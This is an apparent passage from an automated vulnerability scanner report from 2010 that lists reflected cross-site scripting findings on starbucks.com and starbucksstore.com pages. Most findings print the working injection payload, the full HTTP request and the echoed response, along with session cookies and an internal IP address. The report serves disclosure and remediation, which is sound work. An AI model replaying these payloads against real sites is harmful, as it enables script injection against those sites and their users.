This proof of concept demonstrates that arbitrary JavaScript can be injected into the application's response. The payload closes the double-quoted attribute value and appends a style attribute whose CSS expression() is evaluated as script; it contains no angle brackets, so it works where those characters are filtered. expression() is specific to Internet Explorer and is disabled in IE8 standards mode, so the PoC may not fire in other browsers or document modes; the underlying defect, a double quote reflected unencoded into an attribute value, is browser-independent and is fixed by HTML-attribute-encoding the output.

Request

GET /search?keywords=%2797134"style%3d"x%3aexpression(alert(1))"eb377b674b2 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.starbucks.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.starbucks.com
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:24:22 GMT
Content-Length: 33897

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/search?keywords='97134"style="x:expression(alert(1))"eb377b674b2"/>
...[SNIP]...

3.66. http://www.starbucks.com/search [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /search

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61fd7"style%3d"x%3aexpression(alert(1))"61073b145fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 61fd7"style="x:expression(alert(1))"61073b145fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /search?keywords=%27&61fd7"style%3d"x%3aexpression(alert(1))"61073b145fc=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.starbucks.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.starbucks.com
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:27:39 GMT
Content-Length: 33815

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/search?keywords='&61fd7"style="x:expression(alert(1))"61073b145fc=1"/>
...[SNIP]...

3.67. http://www.starbucks.com/site-map [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /site-map

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c69e5"style%3d"x%3aexpression(alert(1))"a6d88efaaa3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c69e5"style="x:expression(alert(1))"a6d88efaaa3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /site-map?c69e5"style%3d"x%3aexpression(alert(1))"a6d88efaaa3=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 21:10:05 GMT
Connection: close
Content-Length: 91702

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/site-map?c69e5"style="x:expression(alert(1))"a6d88efaaa3=1"/>
...[SNIP]...

3.68. http://www.starbucks.com/store-locator [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /store-locator

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5221e"style%3d"x%3aexpression(alert(1))"76d35535f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5221e"style="x:expression(alert(1))"76d35535f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /store-locator?5221e"style%3d"x%3aexpression(alert(1))"76d35535f4=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 20:07:39 GMT
Connection: close
Content-Length: 39833

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/store-locator?5221e"style="x:expression(alert(1))"76d35535f4=1"/>
...[SNIP]...

3.69. http://www.starbucks.com/whats-new [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /whats-new

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68c58"style%3d"x%3aexpression(alert(1))"ef582612840 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 68c58"style="x:expression(alert(1))"ef582612840 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /whats-new?68c58"style%3d"x%3aexpression(alert(1))"ef582612840=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:27:19 GMT
Connection: close
Content-Length: 44105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/whats-new?68c58"style="x:expression(alert(1))"ef582612840=1"/>
...[SNIP]...

3.70. http://www.starbucksstore.com/ [CookingAd cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94486</script><script>alert(1)</script>44201d6d60c was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB94486</script><script>alert(1)</script>44201d6d60c;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21224
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:36:38 GMT
Connection: close

<!--S1--><!--S0-->        
   <link href="/include/sitenew.css" type="text/css" rel="StyleSheet">
   <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
   <meta name="description" content="F
...[SNIP]...
ines. */
   var s_pageName="HomePage"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="HomePage"
   var s_prop3="SBPTPAHP1SHTB94486</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>44201D6D60C"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   var s_state=""

...[SNIP]...

3.71. http://www.starbucksstore.com/GuestAssist/poweredbycooking.asp [CookingAd cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /GuestAssist/poweredbycooking.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7108a</script><script>alert(1)</script>5486b3db851 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /GuestAssist/poweredbycooking.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB7108a</script><script>alert(1)</script>5486b3db851;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 14241
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:37:42 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
weredbycooking.asp"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel=""
   var s_pageType=""
   var s_prop1=""
   var s_prop2="/guestassist/poweredbycooking.asp"
   var s_prop3="SBPTPAHP1SHTB7108A</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>5486B3DB851"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/guestassist/poweredbycooking.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=
...[SNIP]...

3.72. http://www.starbucksstore.com/StarbucksCard/default.asp [CookingAd cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /StarbucksCard/default.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 902c6</script><script>alert(1)</script>c645460f9b8 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /StarbucksCard/default.asp HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB902c6</script><script>alert(1)</script>c645460f9b8;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 19859
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:45:44 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
rbucks Card HomePage"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Starbucks Card HomePage"
   var s_prop3="SBPTPAHP1SHTB902C6</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>C645460F9B8"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/starbuckscard/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   va
...[SNIP]...

3.73. http://www.starbucksstore.com/Tours/ [CookingAd cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /Tours/

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6eafb</script><script>alert(1)</script>892117031bf was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Tours/ HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB6eafb</script><script>alert(1)</script>892117031bf;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 16822
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:29:58 GMT
Connection: close

<!--S1--><!--S0-->
<html>
   <head>    
       <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">    
       <meta NAME="
...[SNIP]...
e="Starbucks Tours Page"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Starbucks Tours Page"
   var s_prop3="SBPTPAHP1SHTB6EAFB</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>892117031BF"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/starbucks-coffee-tours/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaig
...[SNIP]...

3.74. http://www.starbucksstore.com/aff/adredir.asp [CookingAd cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /aff/adredir.asp

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6ee24</script><script>alert(1)</script>86a7be884f9 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /aff/adredir.asp?CCAID=SBPTPAHP1SHCO&Redir=%2Fcoffee%2F HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB6ee24</script><script>alert(1)</script>86a7be884f9;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 29740
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:30:50 GMT
Connection: close

<!--S1--><!--S0-->
<html>
   <head>
       <title>Coffee at Starbucks Store</title>
       <meta name="description" content="Shop for Coffee at Starbucks Store">
       <meta name="keywords" content="Coffee, Sta
...[SNIP]...
s_pageName="Coffee HomePage"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Coffee HomePage"
   var s_prop3="SBPTPAHP1SHTB6EE24</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>86A7BE884F9"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/coffee/default.asp?CCAID=SBPTPAHP1SHCO&Redir=/coffee/"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables
...[SNIP]...

3.75. http://www.starbucksstore.com/coffee [CookingAd cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /coffee

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ea760</script><script>alert(1)</script>6b70b264755 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coffee HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTBea760</script><script>alert(1)</script>6b70b264755;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 29705
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:37:52 GMT
Connection: close

<!--S1--><!--S0-->
<html>
   <head>
       <title>Coffee at Starbucks Store</title>
       <meta name="description" content="Shop for Coffee at Starbucks Store">
       <meta name="keywords" content="Coffee, Sta
...[SNIP]...
s_pageName="Coffee HomePage"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Coffee HomePage"
   var s_prop3="SBPTPAHP1SHTBEA760</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>6B70B264755"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/coffee/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   var s_sta
...[SNIP]...

3.76. http://www.starbucksstore.com/coffee-machines [CookingAd cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /coffee-machines

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76c32</script><script>alert(1)</script>953da364365 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coffee-machines HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB76c32</script><script>alert(1)</script>953da364365;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21134
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:37:59 GMT
Connection: close

<!--S1--><!--S0-->

<html>
   <head>    
       <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name=
...[SNIP]...
eName="Equipment Homepage"
   var s_setRef=""
   var s_server="10.11.5.109"
   var s_channel="Shopping"
   var s_pageType=""
   var s_prop1=""
   var s_prop2="Equipment Homepage"
   var s_prop3="SBPTPAHP1SHTB76C32</SCRIPT><SCRIPT>ALERT(1)</SCRIPT>953DA364365"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/coffee-machines/default.asp"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   
...[SNIP]...

3.77. http://www.starbucksstore.com/coffee-machines/ [CookingAd cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucksstore.com
Path:   /coffee-machines/

Issue detail

The value of the CookingAd cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da449</script><script>alert(1)</script>9e10653ba75 was submitted in the CookingAd cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coffee-machines/ HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
